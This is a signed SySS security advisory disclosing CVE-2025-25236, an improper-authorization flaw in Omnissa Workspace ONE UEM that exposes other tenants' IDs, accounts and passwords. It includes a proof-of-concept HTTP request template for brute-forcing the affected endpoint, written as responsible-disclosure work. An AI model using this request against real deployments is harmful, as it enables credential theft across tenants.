-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-049 Product: Workspace ONE UEM Manufacturer: Omnissa Affected Version(s): 24.6.0.21 Tested Version(s): 24.6.0.21 Vulnerability Type: Improper Authorization (CWE-285) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2025-07-18 Solution Date: 2025-11-12 Public Disclosure: 2026-02-13 CVE Reference: CVE-2025-25236 Author of Advisory: Philipp Buchegger, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Omnissa Workspace ONE is a software for managing endpoint devices. The manufacturer describes the product as follows (see [1]): "Manage, secure and monitor all devices across all platforms. [...] With Omnissa Workspace ONE®, your organization can ease the operational burden on your IT workforce via an autonomous workspace, freeing them to focus on higher-value tasks." Concerning an internet-exposed API, only the parameter "DeviceIdentifier" is required to enumerate further information, like tenant IDs, user accounts, and user passwords, whereby the "DeviceIdentifier" does not have to be assigned to a specific tenant. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Due to an internet-exposed API, it is possible to enumerate customer- specific sensitive information like tenant IDs, user accounts, and user passwords (see also SYSS-2025-047[3]). To enumerate this information, only an existing "DeviceIdentifier" is required. This "DeviceIdentifier" does not need to be assigned to a specific tenant in order to receive information assigned to other tenants. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTTP POST request can be used for a brute-force attack: POST /DeviceServices/awmdmsdk/v3/shareddevice/checkout/authenticate HTTP/1.1 Host: Content-Type: application/json Accept: */* Connection: keep-alive Accept-Language: de-DE Content-Length: Accept-Encoding: gzip, deflate, br User-Agent: Hub/4444 CFNetwork/3826.500.131 Darwin/24.5.0 {"DeviceIdentifier":"","GroupCode":"","Password":"","AuthenticationGroup":"com.air-watch.agent","Username":"","BundleId":"com.air-watch.agent","DeviceType":2} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Provide only feedback if all relevant parameters match at one. See https://www.omnissa.com/omsa-2025-0005 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-07-15: Vulnerability discovered 2025-07-18: Vulnerability reported to manufacturer 2025-09-10: Patch released by manufacturer 2026-02-13: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Omnissa Workspace ONE for Unified Endpoint Management https://go.omnissa.com/Workspace-ONE-for-UEM [2] SySS Security Advisory SYSS-2025-049 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-049.txt [3] SySS Security Advisory SYSS-2025-047 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-047.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Philipp Buchegger and Sebastian Auwärter of SySS GmbH. E-Mail: philipp buchegger@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Philipp_Buchegger.asc Key ID: 0x065809F0BB6747E8 Key Fingerprint: 489F 34EE FA88 27DE 69A0 756B 0658 09F0 BB67 47E8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEESJ807vqIJ95poHVrBlgJ8LtnR+gFAmmPHTQACgkQBlgJ8Ltn R+hcQhAAu1JB8erxsvNc2tXZ23CD2zVlFPNFU0gZlvXz7dHjLyr1tuupc1mmh6e0 GwCmys6+kYNDb8mb6XJrXBARkxpz7/snmCc7ODCxO47cZBWJ7Af8M5AwnO25NzqM C6jWKcEFGXLR3S2Bns5yLVrv1SbChXVJQ4eoQ+AxDb5MVgkRkIK2r+tOKhNYpXJp f6NisN5tgS1AO8wQ8eZnEgLAKzw/5i1N2njyBjTl/lGuZXWBKzglnTsrRUp12cBc XPgkuRp1gKTCPw299iGkOu3J8lCub2OCxXGa/gP4h5AI2DuKKz/wWN9expfrG8mK +AL5XgCZ3YBHMRqoURNjRnCmqf2wJeV4LBtJcwR9J0xH0MKesFQVqmCObXHYblW1 /z+4JCcV/rfJT9ncSl4gW7KKldR6wMSrRBcQhznO52B7qvSoUw//TqQV5BqiTBOE w0gAk3AJhD5NsfKEYdzvKU8kG/Hwe8lzK8R519Clu7m9G6TgblXKJF7wIg8tsDn/ x9mdC+khqQlQXrg+wqX+TAE7Ffnj1FGXrinKUhYm2uASLSMoL1q0qrY866WPk36C 2qhri/8pos82mnc0FzSNC3+p009UwW1TvF59IX8E4rt1O7HTXv5hxb5nej5Dv74D G6Ryboz9DXrSRWNsCPwmrzX1LkRWMM8t4n2ef9lqjj5hB2AE1W8= =sMM9 -----END PGP SIGNATURE-----